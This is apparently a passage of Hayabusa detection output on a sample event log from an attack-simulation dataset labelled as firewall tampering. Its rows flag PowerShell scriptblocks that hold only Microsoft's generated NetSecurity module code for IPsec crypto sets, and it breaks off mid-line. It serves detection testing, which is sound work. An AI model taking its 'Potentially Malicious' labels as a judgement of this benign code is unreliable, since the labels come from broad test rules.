[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdleti",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.329 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"zation_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecQuickModeCryptoSet' -Alias '*' function Copy-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.329 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"zation_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecQuickModeCryptoSet' -Alias '*' function Copy-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.329 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains 